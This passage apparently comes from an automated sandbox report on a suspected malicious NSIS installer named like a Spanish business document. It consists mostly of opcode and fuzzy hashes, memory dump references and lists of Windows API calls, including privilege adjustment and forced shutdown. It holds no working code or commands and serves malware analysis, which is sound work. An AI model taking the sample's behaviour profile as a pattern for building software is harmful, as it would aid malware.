                                                • Opcode Fuzzy Hash: 64d042123273567cb21acdea9c999d1a4c1b2430f6dd98dd9b6737d3762a8a32
                                                • Instruction Fuzzy Hash: 41018135B045144BEB159A7C8464B2E66D7DBC9790F108439F20ACB355DE75DC038395
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 539c190e12c2aac472c3bb73a9ebeb0857f676a0caade7b7c767ef3749ae9e8e
                                                • Instruction ID: cfcb4ac4f65d8b1e07c1d3ed4386bcfc98f55c4a08dbd868687a053383606db5
                                                • Opcode Fuzzy Hash: 539c190e12c2aac472c3bb73a9ebeb0857f676a0caade7b7c767ef3749ae9e8e
                                                • Instruction Fuzzy Hash: 46012435A04314CFDF248961C840BBABBB3EF80350F16443AEA00EB244C670D846C760
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f96749df39d67949deaba15a53d0df94a8b42eceba742fd0fe4b2b166a0e86f
                                                • Instruction ID: b3a801cb116d970aaeb990fd21355bdb06e636d507bbba84d2333dc869f65473
                                                • Opcode Fuzzy Hash: 5f96749df39d67949deaba15a53d0df94a8b42eceba742fd0fe4b2b166a0e86f
                                                • Instruction Fuzzy Hash: 02018C347041109BEB61DA6CD864B2AB3D7EB8E350F60883DF60ADB740EA31DD02C799
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579955134.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38850000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86985449bfd25b3a6397fcc89a9d7ac7fde589b0b6f7c44d264fdc35b191c94e
                                                • Instruction ID: 36fa1038f9a7a0ec98a9e7a3ee019b7f22e661f21396c5d4d2862295a6762e84
                                                • Opcode Fuzzy Hash: 86985449bfd25b3a6397fcc89a9d7ac7fde589b0b6f7c44d264fdc35b191c94e
                                                • Instruction Fuzzy Hash: BF014966E657D31BD3024A719D102D57B659FE7104B18879BD088CB992EB7458C5C3D0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6a253dfa5c0b8e39e4e4edcc71e495a525280529c2a5d69c319b41040c746c7
                                                • Instruction ID: 01e5203ddd0b7b1ce1edf734d1df58394e9fa4d3b46d74ac2fcdbebf8d8485b8
                                                • Opcode Fuzzy Hash: b6a253dfa5c0b8e39e4e4edcc71e495a525280529c2a5d69c319b41040c746c7
                                                • Instruction Fuzzy Hash: 1601A435A01318DBFF249A68D45479EB7ABEBC6360F10443AE549EB340D6759C05CB91
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c093734a8e0fd3c2f66074421dba4013b5dccdb4bbd8aa5765c8fed0c05e19d3
                                                • Instruction ID: 3b4cb198cea61b245d1b79feecc1a7620c28603975d8a0a4ed8acb4d50251e33
                                                • Opcode Fuzzy Hash: c093734a8e0fd3c2f66074421dba4013b5dccdb4bbd8aa5765c8fed0c05e19d3
                                                • Instruction Fuzzy Hash: 5401D171E00210DFDB19EBB598413EE3BB2AB84301F20487EC205E7691FB35CB828B85
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44cc2b311142198f0a30c5fcb2dd2b6eed076e90d2c4e33caae02671d64473f6
                                                • Instruction ID: 948f0cdf185a75d1af9f51c0b235eea881794f92d54932e092397827f5f91311
                                                • Opcode Fuzzy Hash: 44cc2b311142198f0a30c5fcb2dd2b6eed076e90d2c4e33caae02671d64473f6
                                                • Instruction Fuzzy Hash: 9DF02432F11228ABEB044A65CC146EA7B3BEB85390F204439FA01EB280DB71A812C7D0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c28651c649519b146a4a10863214c2a2dd3f75868b4d812f9e23b5d8e2b1c9df
                                                • Instruction ID: 24c49684d9b3edf6effe73d9da542018937702d8ef9f0f8a6335d125ecdb3095
                                                • Opcode Fuzzy Hash: c28651c649519b146a4a10863214c2a2dd3f75868b4d812f9e23b5d8e2b1c9df
                                                • Instruction Fuzzy Hash: 50F08C35B001198FDF04CBA9E844BDEB7F1FF88322F1582A5E529A72D4C6349951CBA0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c106a1751030cf14d3a5b42b625dd5263c86a3b5d5e1b65f74e38351b32c1b7
                                                • Instruction ID: e7996b40ab467042edc593469b49bd40390e43d0ccba4e7f76b419b8afa2db1a
                                                • Opcode Fuzzy Hash: 2c106a1751030cf14d3a5b42b625dd5263c86a3b5d5e1b65f74e38351b32c1b7
                                                • Instruction Fuzzy Hash: 60F04C1194C7589AEB2B5AA00C382B076016B58328B09067EC59D9B193D390C9E0C38A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1bd7bf7ea47c9a3550dec0bac6d3445764c4ad26cee689c1ef7180fc24fd0081
                                                • Instruction ID: 0309c7ac532c7a574209e78e30681eb357bdb42394b5c92bfa1ac0e01f6d3c79
                                                • Opcode Fuzzy Hash: 1bd7bf7ea47c9a3550dec0bac6d3445764c4ad26cee689c1ef7180fc24fd0081
                                                • Instruction Fuzzy Hash: E6012835B40604CFE718DB78D998BAC77B2EF89351F2500A8E1068B3A4CB39AC42CB41
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 982b8d28f6938a62f42b4e2a04c1f4870a716ef9c469a4b7aedfda3c754e97f3
                                                • Instruction ID: ea027d2efebe121785119116976e63db74f80db77b8fb6355b4f172541435e3f
                                                • Opcode Fuzzy Hash: 982b8d28f6938a62f42b4e2a04c1f4870a716ef9c469a4b7aedfda3c754e97f3
                                                • Instruction Fuzzy Hash: BBF082373002196F8F059E99AC01DAF7BABEBC8360B40442AF90993351DF315D229BA5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2ef896748c767b7cec7199edac80c2f1fbb526f6ffbfada62e06093a991d0e4
                                                • Instruction ID: 3b7fed45fb7c862c2f5c43c4a929a1e025faa66f7807c8b824f570ac7e62d9d4
                                                • Opcode Fuzzy Hash: d2ef896748c767b7cec7199edac80c2f1fbb526f6ffbfada62e06093a991d0e4
                                                • Instruction Fuzzy Hash: 83F06D71E0131A9F8B54EFF9A8056EBBBF9EB05210F11847AD809E7204F730CA819B91
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31aa25efd62166ee392436c95d535ac9698135fc0edebeb4b75040a9580be65e
                                                • Instruction ID: c58a0a31b85aa84a5ae9b6c7e8359c7bb3991ca900c0242b22421e426973085a
                                                • Opcode Fuzzy Hash: 31aa25efd62166ee392436c95d535ac9698135fc0edebeb4b75040a9580be65e
                                                • Instruction Fuzzy Hash: E7E0863A664244CBFF004579A5583A8337BDF016A9F100826FC0EDB280CA26C987C211
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 466f4016db720711ebb8513ed44e895998734c4f61251bb960b25fc539e75556
                                                • Instruction ID: 21f60dd9531d997717145d69426c61d9cc27bdb09672c964f1d0d01ec5cfb82d
                                                • Opcode Fuzzy Hash: 466f4016db720711ebb8513ed44e895998734c4f61251bb960b25fc539e75556
                                                • Instruction Fuzzy Hash: 95E04639B052158BAE04A198AA922FC6397EF843A5F604176F524EF345EB22DC13C7A1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 976dd7b1b2e089b5d3f0d4d98d2723e09a0927e4cdedd4c16032eb3186abd258
                                                • Instruction ID: be4cd4d265f3e099873f76b75120e42c8e9b4b99fde5b2a92c77cfa9bba7900c
                                                • Opcode Fuzzy Hash: 976dd7b1b2e089b5d3f0d4d98d2723e09a0927e4cdedd4c16032eb3186abd258
                                                • Instruction Fuzzy Hash: BEF0DA30A20129DBDF10DF94E85ABAEBBB2FF84700F60051AF402AB694CB751C02DB90
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12d60f379611615f31ecfec0136b1ebf9256aa14acd64a1934f046feff9c3349
                                                • Instruction ID: 4483e9cdbc3ea0d4640ff9ff63f8143974799c4e89a5ab9f164c46c352e32bb8
                                                • Opcode Fuzzy Hash: 12d60f379611615f31ecfec0136b1ebf9256aa14acd64a1934f046feff9c3349
                                                • Instruction Fuzzy Hash: F1E08635659280CFFF014568A5543583B77DF12294F100563F80EDB281DA25CD42C721
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9cab1263a67fb7e1522769568941792a47402187b8a30cd15f649f995d3e55a0
                                                • Instruction ID: a5b3ccff0d40ea1649be4f179f8455e0dac8c03dd68c9816569f96dd33f4b0ba
                                                • Opcode Fuzzy Hash: 9cab1263a67fb7e1522769568941792a47402187b8a30cd15f649f995d3e55a0
                                                • Instruction Fuzzy Hash: 96E01A71E0121A9F8B54EEF9A8002EBBAF9EB44650F118476D809E3200F731CA908BD1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80795d30c9eb02dd4c769c56e354a6868048aaf72d44fde8b75e9e80c1b60d54
                                                • Instruction ID: 48e39f311585a2ec4bdf5a4eec2df9537db7e72d7e6d164a9e03af3455871822
                                                • Opcode Fuzzy Hash: 80795d30c9eb02dd4c769c56e354a6868048aaf72d44fde8b75e9e80c1b60d54
                                                • Instruction Fuzzy Hash: 85E0C236B002258B5E04A19464A24EC7393EB946A535045B9F601DB382DA319C46C7D0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 473778f3e38fa9424c2e656e26e1ab121e21e90742ae3771cd7a0bbf88c55a81
                                                • Instruction ID: 29b1c09dff989a2d94d922e5cd8ff53c3e5846041f1fb3b1d3779a46e273f575
                                                • Opcode Fuzzy Hash: 473778f3e38fa9424c2e656e26e1ab121e21e90742ae3771cd7a0bbf88c55a81
                                                • Instruction Fuzzy Hash: 46D09E36B416159FEB005BA4EC4959C7761F785265B140162E60A97550DA350911CB81
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579955134.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38850000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6b01c01718ff3d4b4aa394f65092990845e19ae755d0776ba37502138a93a4a
                                                • Instruction ID: a22994f55f160d561a671362a7c89d5f60a0fce1a0beb8ed74c58678526348d6
                                                • Opcode Fuzzy Hash: d6b01c01718ff3d4b4aa394f65092990845e19ae755d0776ba37502138a93a4a
                                                • Instruction Fuzzy Hash: B2C0C0306083140FD320622EB4083CE77DD5B44211F40411BF049C3900CF906C40C3C0
                                                APIs
                                                • SetErrorMode.KERNEL32 ref: 0040346D
                                                • GetVersion.KERNEL32 ref: 00403473
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                • OleInitialize.OLE32(00000000), ref: 004034C6
                                                • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                • GetModuleHandleW.KERNEL32(00000000,00435000,00000000), ref: 0040350A
                                                • CharNextW.USER32(00000000,00435000,00000020), ref: 00403531
                                                  • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                • GetTempPathW.KERNEL32(00000400,00437800), ref: 0040366B
                                                • GetWindowsDirectoryW.KERNEL32(00437800,000003FB), ref: 0040367C
                                                • lstrcatW.KERNEL32(00437800,\Temp), ref: 00403688
                                                • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp), ref: 0040369C
                                                • lstrcatW.KERNEL32(00437800,Low), ref: 004036A4
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low), ref: 004036B5
                                                • SetEnvironmentVariableW.KERNEL32(TMP,00437800), ref: 004036BD
                                                • DeleteFileW.KERNEL32(00437000), ref: 004036D1
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                • OleUninitialize.OLE32(?), ref: 0040379C
                                                • ExitProcess.KERNEL32 ref: 004037BD
                                                • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,?), ref: 004037D0
                                                • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,?), ref: 004037DF
                                                • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 004037EA
                                                • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?), ref: 004037F6
                                                • SetCurrentDirectoryW.KERNEL32(00437800,00437800), ref: 00403812
                                                • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 0040386C
                                                • CopyFileW.KERNEL32(00438800,00420EE8,?), ref: 00403880
                                                • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                • ExitProcess.KERNEL32 ref: 00403963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 2488574733-334447862
                                                • Opcode ID: e81b6ee9495c618af63e0bf9f93b7c419950b7cdd879aa5472dedf14c25ba188
                                                • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                • Opcode Fuzzy Hash: e81b6ee9495c618af63e0bf9f93b7c419950b7cdd879aa5472dedf14c25ba188
                                                • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                • LoadBitmapW.USER32(0000006E), ref: 00404D6D
                                                • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
                                                • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                • GlobalFree.KERNEL32(?), ref: 0040511D
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                • InvalidateRect.USER32(?,00000000,?), ref: 0040526E
                                                • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                • ShowWindow.USER32(00000000), ref: 004052CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 7e5d6db2f2096b5cb4024e3d37a48845d64c1ad6ed63f1bdcdfba9ff7efaf94e
                                                • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                • Opcode Fuzzy Hash: 7e5d6db2f2096b5cb4024e3d37a48845d64c1ad6ed63f1bdcdfba9ff7efaf94e
                                                • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,758E3420,758E2EE0,00000000), ref: 00405A2C
                                                • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,758E3420,758E2EE0,00000000), ref: 00405A74
                                                • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,758E3420,758E2EE0,00000000), ref: 00405A97
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,758E3420,758E2EE0,00000000), ref: 00405A9D
                                                • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,758E3420,758E2EE0,00000000), ref: 00405AAD
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                • FindClose.KERNEL32(00000000), ref: 00405B5C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: 0WB$\*.*
                                                • API String ID: 2035342205-351390296
                                                • Opcode ID: 3361e8d730ce49dda6b873af9cb242ec702310676dc5fe190db690c4f35e5cae
                                                • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                • Opcode Fuzzy Hash: 3361e8d730ce49dda6b873af9cb242ec702310676dc5fe190db690c4f35e5cae
                                                • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                APIs
                                                • FindFirstFileW.KERNEL32(758E3420,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0), ref: 00406560
                                                • FindClose.KERNEL32(00000000), ref: 0040656C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
